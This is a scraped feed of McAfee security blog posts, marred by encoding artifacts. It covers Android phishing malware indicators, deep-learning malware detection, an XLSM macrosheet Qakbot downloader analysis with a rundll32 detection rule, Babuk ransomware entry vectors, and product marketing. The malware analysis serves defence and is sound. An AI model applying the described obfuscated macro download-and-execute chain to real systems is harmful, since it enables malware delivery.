The¬†malicious application¬†impersonated¬†an¬†IT certificate management module¬†that is¬†purposedly¬†used to¬†validate the¬†device¬†in a non-existent verification server.¬†Just like the most recent version of¬†Elibomi, this fake¬†ITCertificate¬†app requests¬†SMS permissions but it also requests¬†device administrator privileges, probably to¬†make more¬†difficult its removal.¬†The malicious application also¬†simulates a ‚ÄúSecurity Scan‚Ä̬†but in¬†reality¬†what it is doing in the background is stealing personal information like e-mail, phone number and SMS/MMS messages stored in the infected device:¬†

Figure 10. Fake ITCertificate app pretending to do a security scan while it steals personal data in the background 

Just like with the¬†most recent ‚ÄúiMobile‚Ä̬†campaign, this fake ‚ÄúITCertificate‚ÄĚ also exposes the stolen data¬†in one of the C2 servers. Here‚Äôs an example of¬†a stolen SMS message that uses the same log fields¬†and structure¬†as the¬†‚ÄúiMobile‚ÄĚ campaign:¬†

Figure¬†11. SMS message is stolen by the fake ‚ÄúITCertificate‚ÄĚ using the same log structure as ‚ÄúiMobile‚Ä̬†

Interesting string obfuscation technique 

The cybercriminals behind these two pieces of malware designed a simple but interesting string obfuscation technique. All strings are decoded by calling different classes and each class has a completely different table value

Figure 12. Calling the de-obfuscation method with different parameters 

Figure 13. String de-obfuscation method 

Figure 14. String de-obfuscation table 

The algorithm is a simple substitution cipher. For example, 35 is replaced with ‚Äėh‚Äô and 80 is replaced with ‚Äėt‚Äô¬†to obfuscate¬†the string.¬†

Appendix ‚ÄstTechnical Data¬†and¬†IOCs¬†

Hash  Package name 
1e8fba3c530c3cd7d72e208e25fbf704ad7699c0a6728ab1b290c645995ddd56  direct.uujgiq.imobile 
7f7b0555563e08e0763fe52f1790c86033dab8004aa540903782957d0116b87f  ferrero.uabxzraglk.imobile 

 

120a51611a02d1d8bd404bb426e07959ef79e808f1a55ce5bff33f04de1784ac  erni.zbvbqlk.imobile 

 

ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 

 

da900a00150fcd608a09dab8a8ccdcf33e9efc089269f9e0e6b3daadb9126231  foundation.aznohomqlq.imobile 
795425dfc701463f1b55da0fa4e7c9bb714f99fecf7b7cdb6f91303e50d1efc0  fresenius.bowqpd.immobile 
b41c9f27c49386e61d87e7fc429b930f5e01038d17ff3840d7a3598292c935d7  cisco.uemoveqlg.immobile 
8de8c8c95fecd0b1d7b1f352cbaf839cba1c3b847997c804dfa2d5e3c0c87dfe  komatsu.mjeqls.imobile 
ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 
326d81ba7a715a57ba7aa2398824b420fff84cda85c0dd143462300af4e0a37a  alstom.zjeubopqf.certificate 
154cfd0dbb7eb2a4f4e5193849d314fa70dcc3caebfb9ab11b4ee26e98cb08f7  alstom.zjeubopqf.certificate 
c59ecd344729dac99d9402609e248c80e10d39c4d4d712edef0df9ee460fbd7b  alstom.zjeubopqf.certificate 
16284cad1b5a36e2d2ea9f67f5c772af01b64d785f181fd31d2e2bec2d98ce98  alstom.zjeubopqf.certificate 
98fc0d5f914ae47b61bc7b54986295d86b502a9264d7f74739ca452fac65a179  alstom.zjeubopqf.certificate 
32724a3d2a3543cc982c7632f40f9e831b16d3f88025348d9eda0d2dfbb75dfe 

 

computer.yvyjmbtlk.transferInstant 

 

The post Phishing Android Malware Targets Taxpayers in India appeared first on McAfee Blogs.

‚úá McAfee Blogs

The Rise of Deep Learning for Detection and Classification of Malware

By: McAfee Labs ‚ÄĒ

Co-written by Catherine Huang, Ph.D. and Abhishek Karnik 

Artificial Intelligence (AI) continues to evolve and has made huge progress over the last decade. AI shapes our daily lives. Deep learning is a subset of techniques in AI that extract patterns from data using neural networks. Deep learning has been applied to image segmentation, protein structure, machine translation, speech recognition and robotics. It has outperformed human champions in the game of Go. In recent years, deep learning has been applied to malware analysis. Different types of deep learning algorithms, such as convolutional neural networks (CNN), recurrent neural networks and Feed-Forward networks, have been applied to a variety of use cases in malware analysis using bytes sequence, gray-scale image, structural entropy, API call sequence, HTTP traffic and network behavior.  

Most traditional machine learning malware classification and detection approaches rely on handcrafted features. These features are selected based on experts with domain knowledge. Feature engineering can be a very time-consuming process, and handcrafted features may not generalize well to novel malware. In this blog, we briefly describe how we apply CNN on raw bytes for malware detection and classification in real-world data. 

  1. CNN on Raw Bytes 

Figure 1: CNNs on raw bytes for malware detection and classification

The motivation for applying deep learning is to identify new patterns in raw bytes. The novelty of this work is threefold. First, there is no domain-specific feature extraction and pre-processing. Second, it is an end-to-end deep learning approach. It can also perform end-to-end classification. And it can be a feature extractor for feature augmentation. Third, the explainable AI (XAI) provides insights on the CNN decisions and help human identify interesting patterns across malware families. As shown in Figure 1, the input is only raw bytes and labels. CNN performs representation learning to automatically learn features and classify malware.  

2. Experimental Results 

For the purposes of our experiments with malware detection, we first gathered 833,000¬†distinct binary samples (Dirty and Clean)¬†across multiple families, compilers¬†and varying ‚Äúfirst-seen‚ÄĚ time periods.¬†There were¬†large groups of samples from common families although they did utilize varying packers, obfuscators.¬†Sanity checks were performed to discard samples that were corrupt, too large or too small, based on our experiment.¬†From¬†samples¬†that¬†met our sanity check criteria, we extracted raw bytes from these samples and utilized them for¬†conducting¬†multiple¬†experiments.¬†The data¬†was¬†randomly¬†divided¬†into¬†a¬†training and¬†a¬†test set¬†with¬†an¬†80%¬†/¬†20% split.¬†We utilized this data set to run¬†the three¬†experiments.¬†¬†

In our first experiment, raw bytes from the 833,000 samples were fed to the CNN and the performance accuracy in terms of area under receiver operating curve (ROC) was 0.9953.  

One observation with the initial run was that, after raw byte extraction from the 833,000 unique samples, we did find duplicate raw byte entries. This was primarily due to malware families that utilized hash-busting as an approach to polymorphism. Therefore, in our second experiment, we deduplicated the extracted raw byte entries. This reduced the raw byte input vector count to 262,000 samples. The test area under ROC was 0.9920. 

In our third experiment, we attempted multi-family malware classification. We took a subset of 130,000 samples from the original set and labeled 11 categories ‚Äď the 0th¬†were bucketed as Clean, 1-9¬†of which were malware families,¬†and¬†the¬†10th were bucketed as Others.¬†Again, these¬†11 buckets contain samples¬†with varying packers and compilers.¬†We¬†performed¬†another¬†80¬†/¬†20% random split for the training set and test set.¬†For this¬†experiment, we¬†achieved¬†a¬†test accuracy¬†of¬†0.9700. The training and test time on one GPU¬†was 26 minutes.¬†¬†

3. Visual Explanation 

Figure 2: visual explanation using T-SNE and PCA before and after the CNN training
Figure 2: A visual explanation using T-SNE and PCA before and after the CNN training

To understand the CNN training process, we performed a visual analysis for the CNN training. Figure 2 shows the t-Distributed Stochastic Neighbor Embedding (t-SNE) and Principal Component Analysis (PCA) for before and after CNN training. We can see that after training, CNN is able to extract useful representations to capture characteristics of different types of malware as shown in different clusters. There was a good separation for most categories, lending us to believe that the algorithm was useful as a multi-class classifier. 

We then performed XAI to understand CNN’s decisions. Figure 3 shows XAI heatmaps for one sample of Fareit and one sample of Emotet. The brighter the color is the more important the bytes contributing to the gradient activation in neural networks. Thus, those bytes are important to CNN’s decisions. We were interested in understanding the bytes that weighed in heavily on the decision-making and reviewed some samples manually. 

Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)
Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)

4. Human analysis to understand the ML decision and XAI  

Figure 4: Human analysis on CNN’s predictions
Figure 4: Human analysis on CNN’s predictions

To verify if the CNN can learn new patterns, we fed a few never before seen samples to the CNN, and requested a human expert to verify the CNN’s decision on some random samples. The human analysis verified that the CNN was able to correctly identify many malware families. In some cases, it identified samples accurately before the top 15 AV vendors based on our internal tests. Figure 4 shows a subset of samples that belong to the Nabucur family that were correctly categorized by the CNN despite having no vendor detection at that point in time. It’s also interesting to note that our results showed that the CNN was able to currently categorize malware samples across families utilizing common packers into an accurate family bucket. 

Figure 5: domain analysis on sample compiler
Figure 5: domain analysis on sample compiler

We ran domain analysis on the same sample complier VB files. As shown in Figure 5, CNN was able to identify two samples of a threat family before other vendors. CNN agreed with MSMP/other vendors on two samples. In this experiment, the CNN incorrectly identified one sample as Clean.  

Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Above is XAI heatmap for one sample.
Above is XAI heatmap for one sample.

We asked a human expert to inspect an XAI heatmap and verify if those bytes in bright color are associated with the malware family classification. Figure 6 shows one sample which belongs to the Sodinokibi family. The bytes identified by the XAI (c3 8b 4d 08 03 d1 66 c1) are interesting because the byte sequence belongs to part of the Tea decryption algorithm. This indicates these bytes are associated with the malware classification, which confirms the CNN can learn and help identify useful patterns which humans or other automation may have overlooked. Although these experiments were rudimentary, they were indicative of the effectiveness of the CNN in identifying unknown patterns of interest.  

In summary, the experimental results and visual explanations demonstrate that CNN can automatically learn PE raw byte representations. CNN raw byte model can perform end-to-end malware classification. CNN can be a feature extractor for feature augmentation. The CNN raw byte model has the potential to identify threat families before other vendors and identify novel threats. These initial results indicate that CNN’s can be a very useful tool to assist automation and human researcher in analysis and classification. Although we still need to conduct a broader range of experiments, it is encouraging to know that our findings can already be applied for early threat triage, identification, and categorization which can be very useful for threat prioritization.  

We believe that McAfee’s ongoing AI research, such as deep learning-based approaches, leads the security industry to tackle the evolving threat landscape, and we look forward to continuing to share our findings in this space with the security community. 

The post The Rise of Deep Learning for Detection and Classification of Malware appeared first on McAfee Blogs.

‚úá McAfee Blogs

XLSM Malware with MacroSheets

By: McAfee Labs ‚ÄĒ

Written by: Lakshya Mathur

Excel-based malware has been around for decades and has been in the limelight in recent years. During the second half of 2020, we saw adversaries using Excel 4.0 macros, an old technology, to deliver payloads to their victims. They were mainly using workbook streams via the XLSX file format. In these streams, adversaries were able to enter code straight into cells (that’s why they were called macro-formulas). Excel 4.0 also used API level functions like downloading a file, creation of files, invocation of other processes like PowerShell, cmd, etc.  

With the evolution of technology, AV vendors started to detect these malicious Excel documents effectively and so to have more obfuscation and evasion routines attackers began to shift to the XLSM file format. In the first half of 2021, we have seen a surge of XLSM malware delivering different family payloads (as shown in below infection chart). In XLSM adversaries make use of Macrosheets to enter their malicious code directly into the cell formulas. XLSM structure is the same as XLSX, but XLSM files support VBA macros which are more advanced technology of Excel 4.0 macros. Using these macrosheets, attackers were able to access powerful windows functionalities and since this technique is new and highly obfuscated it can evade many AV detections. 

Excel 4.0 and XLSM are both known to download other malware payloads like ZLoader, Trickbot, Qakbot, Ursnif, IcedID, etc. 

Field hits for XLSM macrosheet malware detection
Field hits for XLSM macrosheet malware detection

The above figure shows¬†the¬†Number of samples¬†weekly¬†detected by¬†the¬†detected name¬†‚ÄúDownloader-FCEI‚Ä̬†which specifically targets XLSM¬†macrosheet¬†based malware.¬†

Detailed Technical Analysis 

XLSM Structure 

XLSM files are spreadsheet files that support macros. A macro is a set of instructions that performs a record of steps repeatedly. XLSM files are based upon Open XLM formats that were introduced in Microsoft Office 2007. These file types are like XLSX but in addition, they support macros. 

Talking about the XLSM structure when we unzip the file, we see four basic contents of the file, these are shown below. 

Figure-1: Content inside XLSM file
Figure-1: Content inside XLSM file
  • _rels¬†contains the starting package-level relationship.¬†
  • docProps¬†contains the metadata of the excel file.¬†
  • xl¬†folder contains the actual contents of the file.¬†
  • [Content_Types].xml has references to the¬†XML¬†files present within the above folders.¬†

We will focus more on¬†the¬†‚Äúxl‚Ä̬†folder contents.¬†This folder contains all the excel file main contents like¬†all the worksheets, media files, styles.xml file, sharedStrings.xml file, workbook.xml¬†file,¬†etc. All these files and folders have¬†data related to different aspects of¬†the¬†excel file. But for XLSM files we will focus on one unique folder called¬†macrosheets.¬†

These XLSM files contain macrosheets as shown in figure-2 which are nothing but XML sheet files that can support macros. These sheets are not available in other Excel file formats. In the past few months, we have seen a huge surge in XLSM file-type malware in which attackers store malicious strings hidden within these macrosheets. We will see more details about such malware in this blog. 

Figure-2: Macrosheets folder inside xl folder
Figure-2: Macrosheets folder inside xl folder

To explain further how attackers uses XLSM files we have taken a Qakbot sample with SHA 91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e. 

Infection Chain

Figure-3: Infection chain for Qakbot Malware
Figure-3: Infection chain for Qakbot Malware

The infection chain for both Excel 4.0 Qakbot and XLSM Qakbot is similar. They both downloads dll and execute it using rundll32.exe with DllResgisterServer as the export function. 

XLSM Threat Analysis 

On opening the XLSM file there is an image that prompts the user to enable the content. To look legitimate and clean malicious actors use a very official-looking template as shown below.

Figure-4: Image of Xlsm file face
Figure-4 Image of Xlsm file face

On digging deeper, we see its internal workbook.xml file. 

Figure-5: workbook.xml content
Figure-5: workbook.xml content

Now as we can see in the workbook.xml file¬†(Figure-5), there¬†is¬†a¬†total¬†of¬†6 sheets and¬†their¬†state is hidden.¬†Also,¬†two cells¬†have¬†a¬†predefined name and one of them is¬†Sheet2323!$A$1¬†defined as¬†‚Äú_xlnm.Auto_Open‚Ä̬†which is¬†similar to¬†Sub¬†Auto_Open() as we generally see in macro files. It automatically runs the macros when¬†the¬†user clicks on Enable Content.¬†¬†

As we saw in Figure-3 on opening the file, we only see the enable content image. Since the state of sheets was hidden, we can right-click on the main sheet tab and we will see unhide option there, then we can select each sheet to unhide it. On hiding the sheet and change the font color to red we saw some random strings as seen in figure 6. 

Figure-6: Sheet face of xlsm file
Figure-6: Sheet face of xlsm file

These hidden sheets contain malicious strings in an obfuscated manner. So, on analyzing more we observed that sheets inside the macrosheets folder contain these malicious strings. 

Figure-7: Content of macrosheet XML file
Figure-7: Content of macrosheet XML file

Now as we can in figure-7 different tags are used in this XML sheet file. All the malicious strings are present in two tags <f> and <v> tags inside <sheetdata> tags. Now let’s look more in detail about these tags. 

<v> (Cell Value) tags are used to store values inside the cell. <f> (Cell Formula) tags are used to store formulas inside the cell. Now in the above sheet <v> tags contain the cached formula value based on the last time formula was calculated. Formula cells contain formulas like ‚ÄúGOTO(Sheet2!H13)‚ÄĚ, now as we can see here attackers can store different formulas while referencing cells from different sheets. These operations are done to produce more and more obfuscated sheets and¬†evade¬†AV signatures.¬†

When the user clicks on the enable content button the execution starts from the Auto_Open cell, after which each sheet formula will start to execute one by one. The final deobfuscated string is shown below. 

Figure-8: Final De-Obfuscated strings from the file
Figure-8: Final De-Obfuscated strings from the file

Here¬†the¬†URLDownloadToFIleA¬†API¬†is used to download the payload and the string ‚ÄúJJCCBB‚ÄĚ is used to specify data types to call¬†the¬†API.¬†There are multiple URI‚Äôs and from one of them,¬†the¬†DLL payload gets downloaded and saved as ..\\lertio.cersw. This DLL payload is then executed using rundll32. All these malicious activities¬†get¬†carried out using various excel based formulas like REGISTER, EXEC, etc.¬†

Coverage and prevention guidance: 

McAfee’s Endpoint products detect this variant of malware as below: 

The main malicious document with SHA256 (91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e) is detected as ‚ÄúDownloader-FCEI‚Ä̬†with current DAT files.¬†

Additionally, with the help of McAfee’s Expert rule feature, customers can add a custom behavior rule, specific to this infection pattern. 

Rule { 

    Process { 

¬†¬†¬†¬†¬†¬†¬† Include OBJECT_NAME { -v ‚ÄúEXCEL.exe‚ÄĚ }¬†

    } 

Target { 

        Match PROCESS { 

¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† Include OBJECT_NAME { -v ‚Äúrundll32.exe‚ÄĚ }¬†

¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†Include PROCESS_CMD_LINE { -v ‚Äú* ..\\*.*,DllRegisterServer‚ÄĚ } ¬†

¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†Include -access ‚ÄúCREATE‚Ä̬†

         } 

  } 

} 

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the Macro execution for Office files. We advise everyone to read our blog on these types of malicious XLSM files and their obfuscation techniques to understand more about the threat. 

Different techniques & tactics are used by the malware to propagate, and we mapped these with the MITRE ATT&CK platform. 

  • T1064(Scripting): Use of Excel 4.0 macros and different excel formulas to download¬†the malicious payload.¬†
  • Defense Evasion (T1218.011): Execution of Signed binary to abuse Rundll32.exe and proxy executes¬†the malicious code is observed in this¬†Qakbot¬†variant.¬†¬†
  • Defense Evasion (T1562.001): Office file tries to convince¬†a¬†victim¬†to disable security features by using a clean-looking image.¬†
  • Command and Control(T1071): Use of Application Layer Protocol HTTP to connect to¬†the¬†web and then downloads the malicious payload.¬†

Conclusion 

XLSM malware has been seen delivering many malware families. Many major families like Trickbot, Gozi, IcedID, Qakbot are using these XLSM macrosheets in high quantity to deliver their payloads. These attacks are still evolving and keep on using various obfuscated strings to exploit various windows utilities like rundll32, regsvr32, PowerShell, etc. 

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is only safe to enable them when the document received is from a trusted source and macros serve an expected purpose. 

The post XLSM Malware with MacroSheets appeared first on McAfee Blogs.

‚úá McAfee Blogs

Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems?

By: Thibault Seret ‚ÄĒ

Co-written with Northwave‚Äôs No√ęl Keijzer.

Executive Summary

For a long time, ransomware gangs were mostly focused on Microsoft Windows operating systems. Yes, we observed the occasional dedicated Unix or Linux based ransomware, but cross-platform ransomware was not happening yet. However, cybercriminals never sleep and in recent months we noticed that several ransomware gangs were experimenting with writing their binaries in the cross-platform language Golang (Go).

Our worst fears were confirmed when Babuk announced on an underground forum that it was developing a cross-platform binary aimed at Linux/UNIX and ESXi or VMware systems. Many core backend systems in companies are running on these *nix operating systems or, in the case of virtualization, think about the ESXi hosting several servers or the virtual desktop environment.

We touched upon this briefly in our previous blog, together with the many coding mistakes the Babuk team is making.

Even though Babuk is relatively new to the scene, its affiliates have been aggressively infecting high-profile victims, despite numerous problems with the binary which led to a situation in which files could not be retrieved, even if payment was made.

Ultimately, the difficulties faced by the Babuk developers in creating ESXi ransomware may have led to a change in business model, from encryption to data theft and extortion.

Indeed, the design and coding of the decryption tool are poorly developed, meaning if companies decide to pay the ransom, the decoding process for encrypted files can be really slow and there is no guarantee that all files will be recoverable.

Coverage and Protection Advice

McAfee’s EPP solution covers Babuk ransomware with an array of prevention and detection techniques.

McAfee ENS ATP provides behavioral content focusing on proactively detecting the threat while also delivering known IoCs for both online and offline detections. For DAT based detections, the family will be reported as Ransom-Babuk!. ENS ATP adds 2 additional layers of protection thanks to JTI rules that provide attack surface reduction for generic ransomware behaviors and RealProtect (static and dynamic) with ML models targeting ransomware threats.

Updates on indicators are pushed through GTI, and customers of Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.

Initially, in our research the entry vector and the complete tactics, techniques and procedures (TTPs) used by the criminals behind Babuk remained unclear.

However, when its affiliate recruitment advertisement came online, and given the specific underground meeting place where Babuk posts, defenders can expect similar TTPs with Babuk as with other Ransomware-as-a-Service families.

In its recruitment posting Babuk specifically asks for individuals with pentest skills, so defenders should be on the lookout for traces and behaviors that correlate to open source penetration testing tools like winPEAS, Bloodhound and SharpHound, or hacking frameworks such as CobaltStrike, Metasploit, Empire or Covenant. Also be on the lookout for abnormal behavior of non-malicious tools that have a dual use, such as those that can be used for things like enumeration and execution, (e.g., ADfind, PSExec, PowerShell, etc.) We advise everyone to read our blogs on evidence indicators for a targeted ransomware attack (Part1, Part2).

Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common amongst ransomware criminals:

  • E-mail Spearphishing (T1566.001). Often used to directly engage and/or gain an initial foothold, the initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the ransomware gangs to continue completely compromising a victim‚Äôs network. We have observed this in the past with Trickbot and Ryuk, Emotet and Prolock, etc.
  • Exploit Public-Facing Application (T1190) is another common entry vector; cyber criminals are avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door if you have the keys? Weakly protected Remote Desktop Protocol (RDP) access is a prime example of this entry method. For the best tips on RDP security, we would like to highlight our¬†blog¬†explaining RDP security.
  • Valid accounts can also be obtained via commodity malware such as infostealers, that are designed to steal credentials from a victim‚Äôs computer. Infostealer logs containing thousands of credentials are purchased by ransomware criminals to search for VPN and corporate logins. As an organization, robust credential management and multi-factor authentication on user accounts is an absolute must have.

When it comes to the actual ransomware binary, we strongly advise updating and upgrading your endpoint protection, as well as enabling options like tamper protection and rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

  • A recent forum announcement indicates that the Babuk operators are now expressly targeting Linux/UNIX systems, as well as ESXi and VMware systems
  • Babuk is riddled with coding mistakes, making recovery of data impossible for some victims, even if they pay the ransom
  • We believe these flaws in the ransomware have led the threat actor to move to data theft and extortion rather than encryption

Learn more about how Babuk is transitioning away from an encryption/ransom model to one focused on pure data theft and extortion in our detailed technical analysis.

The post Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems? appeared first on McAfee Blogs.

‚úá McAfee Blogs

Fighting new Ransomware Techniques with McAfee’s Latest Innovations

By: Nicolas Stricher ‚ÄĒ

In 2021 ransomware attacks have been dominant among the bigger cyber security stories. Hence, I was not surprised to see that McAfee’s June 2021 Threat report is primarily focused on this topic.

This report provides a large range of statistics using the McAfee data lake behind MVISION Insights, including the Top MITRE ATT&CK Techniques. In this report I highlight the following MITRE techniques:

  1. Spear phishing links (Initial Access)
  2. Exploit public-facing applications (Initial Access)
  3. Windows Command Shell (Execution)
  4. User execution (Execution)
  5. Process Injection (Privilege escalation)
  6. Credentials from Web Browsers (Credential Access)
  7. Exfiltration to Cloud Storage (Exfiltration)

I also want to highlight one obvious technique which remains common across all ransomware attacks at the end of the attack lifecycle:

  1. Data encrypted for impact (Impact)

Traditional defences based on anti-malware signatures and web protection against known malicious domains and IP addresses can be insufficient to protect against these techniques. Therefore, for the rest of this article, I want to cover a few recent McAfee innovations which can make a big difference in the fight against ransomware.

Unified Cloud Edge with Remote Browser Isolation

The following three ransomware techniques are linked to web access:

  • Spear phishing links
  • User execution
  • Exfiltration to Cloud Storage

Moreover, most ransomware attacks require some form of access to a command-and-control server to be fully operational.

McAfee Remote Browser Isolation (RBI) ensures no malicious web content ever even reaches enterprise endpoints’ web browsers by isolating all browsing activity to unknown and risky websites into a remote virtual environment. With spear phishing links, RBI works best when running the mail client in the web browser. The user systems cannot be compromised if web code or files cannot run on them, making RBI the most powerful form of web threat protection available. RBI is included in most McAfee United Cloud Edge (UCE) licenses at no additional cost.

Figure 1. Concept of Remote Browser Isolation

McAfee Client Proxy (MCP) controls all web traffic, including ransomware web traffic initiated without a web browser by tools like MEGAsync and Rclone. MCP is part of McAfee United Cloud Edge (UCE).

Protection Against Fileless Attacks

The following ransomware techniques are linked to fileless attacks:

  • Windows Command Shell (Execution)
  • Process Injection (Privilege escalation)
  • User Execution (Execution)

Many ransomware attacks also use PowerShell.

Figure 2. Example of an attack kill chain with fileless

McAfee provides a large range of technologies which protect against fileless attack methods, including McAfee ENS (Endpoint Security) Exploit prevention and McAfee ENS 10.7 Adaptive Threat Protection (ATP). Here are few examples of Exploit Prevention and ATP rules:

  • Exploit 6113-6114-6115-6121 Fileless threat: self-injection
  • Exploit 6116-6117-6122: Mimikatz suspicious activity
  • ATP 316: Prevent PDF readers from starting cmd.exe
  • ATP 502: Prevent new services from being created via sc.exe or powershell.exe

Regarding the use on Mimikatz in the example above, the new McAfee ENS 10.7 ATP Credential Theft Protection is designed to cease attacks against Windows LSASS so that you do not need to rely on the detection of Mimikatz.

Figure 3. Example of Exploit Prevention rules related to Mimikatz

ENS 10.7 ATP is now included in most McAfee Endpoint Security licenses at no additional cost.

Proactive Monitoring and Hunting with MVISION EDR

To prevent initial access, you also need to reduce the risks linked to the following technique:

  • Exploit public facing applications (Initial Access)

For example, RDP (Windows Remote Desktop Protocol) is a common initial access used by ransomware attacks. You may have a policy that already prohibits or restricts RDP but how do you know it is enforced on every endpoint?

With MVISION EDR (Endpoint Detection and Response) you can perform a real time search across all managed systems to see what is happening right now.

Figure 4. MVISION EDR Real-time Search to verify if RDP is enabled or disabled on a system

Figure 5. MVISION EDR Real-time Search to identify systems with active connections on RDP

MVISION EDR maintains a history of network connections inbound and outbound from the client. Performing an historical search for network traffic could identify systems that actively communicated on port 3389 to unauthorized addresses, potentially detecting attempts at exploitation.

MVISION EDR also enables proactive monitoring by a security analyst. The Monitoring Dashboard helps the analyst in the SOC quickly triage suspicious behavior.

For more EDR use cases related to ransomware see this blog article.

Actionable Threat Intelligence

With MVISION Insights you do not need to wait for the latest McAfee Threat Report to be informed on the latest ransomware campaigns and threat profiles. With MVISION Insights you can easily meet the following use cases:

  • Proactively assess your organization‚Äôs exposure to ransomware and prescribe how to reduce the attack surface:
    • Detect whether you have been hit by a known ransomware campaign
    • Run a Cyber Threat Intelligence program despite a lack of time and expertise
    • Prioritize threat hunting using the most relevant indicators

These use cases are covered in the webinar How to fight Ransomware with the latest McAfee innovations.

Regarding the following technique from the McAfee June 2021 Threat Report:

Credentials from Web Browsers (Credential Access)

MVISION Insights can display the detections in your environment as well as prevalence statistics.

Figure 6. Prevalence statistics from MVISION Insights on the LAZAGNE tool

MVISION Insights is included in several Endpoint Security licenses.

Rollback of Ransomware Encryption

Now we are left with the last technique in the attack lifecycle:

  • Data encrypted for impact (Impact)

McAfee ENS 10.7 Adaptive Threat Protection (ATP) provides dynamic application containment of suspicious processes and enhanced remediation with an automatic rollback of the ransomware encryption.

Figure 7. Configuration of Rollback remediation in ENS 10.7

You can see how files impacted by ransomware can be restored through Enhanced Remediation in this video. For more best practices on tuning Dynamic Application Containment rules, check the knowledge base article here.

Additional McAfee Protection Against Ransomware

Last year McAfee released this blog article covering additional capabilities from McAfee Endpoint Security (ENS), Endpoint Detection and Response (EDR) and the Management Console (ePO) against ransomware including:

  • ENS Exploit prevention
  • ENS Firewall
  • ENS Web control
  • ENS Self protection
  • ENS Story Graph
  • ePO Protection workspace
  • Additional EDR use cases against ransomware

Summary

To increase your protection against ransomware you might already be entitled to:

  • ENS 10.7 Adaptive Threat Protection
  • Unified Cloud Edge with Remote Browser Isolation and McAfee Client Proxy
  • MVISION Insights
  • MVISION EDR

If you are, you should start using them as soon as possible, and if you are not, contact us.

The post Fighting new Ransomware Techniques with McAfee’s Latest Innovations appeared first on McAfee Blogs.

‚úá McAfee Blogs

An Overall Philosophy on the Use of Critical Threat Intelligence

By: Patrick Flynn ‚ÄĒ

The overarching threat facing cyber organizations today is a highly skilled asymmetric enemy, well-funded and resolute in his task and purpose.   You never can exactly tell how they will come at you, but come they will.  It’s no different than fighting a kinetic foe in that, before you fight, you must choose your ground and study your enemy’s tendencies.

A lot of focus has been placed on tools and updating technology, but often we are pushed back on our heels and find ourselves fighting a defensive action.

But what if we change?  How do we do that?

The first step is to study the battlefield, understand what you’re trying to protect and lay down your protection strategy.  Pretty basic right??

Your technology strategy is very important, but you must embrace and create a thorough Cyber Threat Intelligence (CTI) doctrine which must take on many forms.

First, there is data, and lots of it.  However, the data must take specific forms to research and detect nascent elements where the adversary is attempting to catch you napping or give you the perception that the activity you see is normal.

As you pool this data, it must be segmented into layers and literally mapped to geographic locations across the globe.  The data is classified distinctly as malicious and reputations are applied.  This is a vital step in that it enables analytical programs, along with human intelligence analysts to apply the data within intelligence reports which themselves can take on many forms.

Once the data takes an analytic form, then it allows organizations to forensically piece together a picture of an attack.  This process is painstakingly tedious but necessary to understand your enemy and his tendencies.  Tools are useful, but it’s always the human in the loop that will recognize the tactical and strategic implications of an adversary’s moves. Once you see the picture, it becomes real, and then you’re able to prepare your enterprise for the conflict that follows.

Your early warning and sensing strategy must incorporate this philosophy.¬† You must sense, collect, exploit, process, produce and utilize each intelligence product that renders useful information.¬† It‚Äôs this process that will enable any organization to move decisively to and stay ‚Äúleft of boom‚ÄĚ.

The McAfee Advanced Programs Group (APG) was created eight years ago to support intelligence organizations that embrace and maintain a strong CTI stance.¬† Its philosophy is to blend people, processes, data and a strong intelligence heritage to enable our customers to understand the cyber battlefield to proactively protect, but ‚Äúmaneuver‚ÄĚ when necessary to avoid an attack.

APG applies three key disciplines or mission areas to provide this support.

First, we developed an internal tool called the Advanced Threat Landscape Analysis System (ATLAS).  This enables our organization to apply our malicious threat detections to a geospatial map display to see where we’re seeing malicious data.  ATLAS draws from our global network of billions of threat sensors to see trillions of detections each day, but enables our analysts to concentrate on the most malicious activity.  Then we’re better able to research and report accurate threat landscape information.

The second leg in the stool is our analytical staff, the true cyber ninjas that apply decades of experience supporting HUMINT operations across the globe and a well-established intelligence-based targeting philosophy to the cyber environment.¬† The result is a true understanding of the cyber battlefield enabling the leadership to make solid ‚Äúintelligence-based‚ÄĚ decisions.

Finally, the third leg is our ability to develop custom solutions and interfaces to adapt in a very custom way our ability to see and study data.  We have the ability to leverage 2.8 billion malicious detections, along with 20 other distinct malicious feeds, to correlate many different views, just not the McAfee view.  We interpret agnostically.

These three legs provide APG a powerful CTI advantage allowing our customers to adapt and respond to events by producing threat intelligence dynamically. When using this service it allows the customer to be fully situationally aware in a moments notice (visual command and control). Access to the data alone is an immense asset to any organization.¬† This allows each customer not only to know what their telemetry is, but also provides real time insights into the entire world ecosystem. Finally, the human analysis alone is immensely valuable.¬† It allows for the organizations to read and see/understand what it all means (the who, what, where and why).¬†¬† ‚ÄúThe so what!!‚ÄĚ

The post An Overall Philosophy on the Use of Critical Threat Intelligence appeared first on McAfee Blogs.

‚úá McAfee Blogs

REvil Ransomware Uses DLL Sideloading

